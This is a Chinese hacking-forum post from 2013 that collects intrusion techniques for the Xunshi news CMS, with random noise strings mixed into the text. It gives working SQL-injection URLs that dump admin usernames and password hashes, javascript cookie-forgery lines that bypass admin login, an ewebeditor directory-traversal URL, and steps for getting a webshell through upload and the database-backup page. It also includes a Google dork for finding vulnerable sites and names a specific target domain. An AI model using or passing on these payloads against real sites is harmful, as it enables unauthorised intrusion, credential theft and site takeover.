找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2707|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
% m# ^: V/ t3 s
" ]- S  ^6 y' c  G/ f在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
1 ]3 s0 N" i6 i. a
. E6 P! J; ^: u+ A以下本文总结来自黑防去年第9期杂志上的内容...
+ i5 u: [. T$ K! T+ B3 H; ^- X9 }" v
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%) ~/ F! m0 D5 D, W
9 t3 P7 s1 U9 _1 |0 r9 ?
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 ' m9 G# j( I4 x, e3 E
1 @1 \/ Y& M" X/ ]! u  b
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况* t5 v6 ?" V+ T2 G5 C
这里一个注入- d* u% P' ?! s8 O% }9 S, j8 L1 g
( \/ l3 L* C7 n, o' C
效果如图:
$ o7 _! L4 P# ?- M
6 P) N" f0 w. G
& ?/ F# w; b( e( F9 B9 P; [
. P" N1 K' Y4 h. F! [& P' E这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.* n) ~0 t" R5 R8 _/ s

/ T/ v' `6 N+ A; Q3 i密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
2 E$ N- x1 D9 ~  l& v
8 R+ r. R3 d: \2 d! m5 gjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));* o. d/ d( H" G& t) r$ V4 |" E/ w

* a3 V+ m) ], H那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
* M4 f! h- v6 T, v: Y- A  T% \( ^- H0 f9 }1 x" b- U- D* ~9 s7 P
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
! x! `% m" E/ B: U% M) @- n$ N7 f
) s- f. w; F: d- E: y5 O* c, Q# F& C它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以8 z3 c- R' I" @+ J

. n' F4 B( f+ [( |访问这页面来列目录..步骤如下:& w5 U% H7 m  f; F4 _; @3 [/ I7 m! r

* C6 G* Q# T7 `+ Xjavascript:alert(document.cookie="admindj=1") 1 v, n" s, G. s6 h
. i# H5 ]7 |8 S, O$ E
http://www.political-security.co ... asp?id=46&dir=../..
; D# V! M  v8 d; T7 y& g: J0 K# c9 l
效果如图:5 s# t+ o: n5 y5 j# Y
! l2 F6 p5 K( h7 z9 o
  d4 V; Z4 t: L. N
, _. H4 `1 U% {. G( @  J) T
这样全站目录都能瞧了..找到后台目录..进去..3 M, P# c5 ?9 Y" W  q
9 ?! b5 F- F8 |- {
那么进了后台怎么拿shell??上传--备份就ok了..' J8 a5 n& W1 E7 l  j

8 D: ^0 J5 ^% f$ j  d9 L那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
4 P# P- Q% S3 D# O8 m0 f4 X! Y- ?2 A# w) j7 U
这个我也碰到过一次..你都可以通过列目录来实现..
) ~0 o  K1 A4 a2 F+ j7 D/ s+ z
5 I: {% N/ ^' F% n% ?- \javascript:alert(document.cookie="admindj=1") + _' }' t0 X( R# _$ v* t+ p4 F8 ]$ x
/ m2 g3 v6 ^0 a; G
http://www.political-security.co ... p?action=BackupData
$ I( j3 R8 r6 ~  @- S$ ?% x
+ ~. i7 U% s, q" j  {备份ok..
: `2 w8 g& ?& p% Q  G: G- i+ @
' P% r4 |/ ]  ]; Z$ n  Y; F那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?/ c, V: q. g' L: H% D
( A2 @3 f  a1 \: D+ U
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下: H9 t7 K1 f' i  ^5 ~1 ?

, a  t$ s6 l3 O7 ~$ e! |1 H2 a然后访问此页面进行注入..步骤如下:* U9 w9 z- t- \+ T& O! D, K4 F

( ]# Y& G8 E* \5 Y8 Y/ y& J& rjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")/ u$ h3 {8 A& f% `/ s+ k# e
" V' t  f, _: q$ I
然后请求admin/admin_chk.asp页面
* ?4 f; O1 q3 k" _8 V
8 {( V, U! `! E! [' H输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
; ^% t1 i7 C" j6 U* b1 r3 f$ |& J
9 G+ v' d- V6 v/ E6 q26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin8 u% K% r8 D: u+ ]2 [
$ \' M, J3 o! }
效果如图所示:
4 Z( y- N6 |% H- _$ x- ^* `
: w0 \, w3 r1 P! u7 y; T
6 r' R; d2 G8 g4 o4 O
; _- U3 U5 _  X  c4 e- {- Z* C, w" \讯时漏洞2( ]' G; q6 M9 c5 D
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)7 i( z8 G7 l7 `: v0 @9 d& M0 ^  q
7 R9 ~( E( l, y9 n$ c. Q
1、/admin/admin_news_pl_view.asp?id=1% I! t" _. S, t$ L# p" l* v
//id任意 填入以下语句
& ~2 x( x- n, n( ~; H7 U4 _
# R) Q3 N/ D( [! X! H2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
6 T, ~2 ]( b3 } ; ?& w+ _7 E& H/ W- g2 J" z% ]* i

5 h4 E2 q1 i1 @. Q/ q1 C! {; T; D" l" N! ~
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='( o! b, k5 z/ R" y6 t

# x. Z* @8 t6 h% Z
1 Y# n' G, T1 i. T5 R; Y+ `$ S! V: [& L$ N! F0 a
爆出管理员帐号和密码了- u% f, e; z8 g

  P4 x' a" _% G3 Z) L# h3 ~% ]' o( F' t) R4 K3 f
5 n& F" K- b3 G( t: F& ]6 a
4、cookies进后台
' U( H. j& o# F4 l
+ P" ~& f6 x- p) Q1 k. Fjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
1 t; v  p  M' t; b/ }3 R6 g - H. L  p3 J: I$ ]% j+ S
' y* \  Z% w4 ]' R' B. n
/ K9 m! }" n# d/ r% o
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!& ?+ m$ B. U# ?8 U3 `& f) F' k0 ^
) L( Z! S9 H2 q. h

/ ^. M/ l/ d: w& ~2 p
/ L8 |* s1 r% b: G$ S6、后台有上传和备份取SHELL不难。
% t# w1 X. q0 `2 R , G/ |* x2 v( I8 d3 O6 U
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..( p3 Q$ ~- a2 B- g5 o

# q* t- y% n: d3 ?2 o/ H* d) c. k. z逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
, X5 v/ K8 C! V; s. I
5 e# f1 }/ C# D, j0 w& {" t' s! [: ^1 ?
6 ~  p/ o5 e7 X- P4 t& }% N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表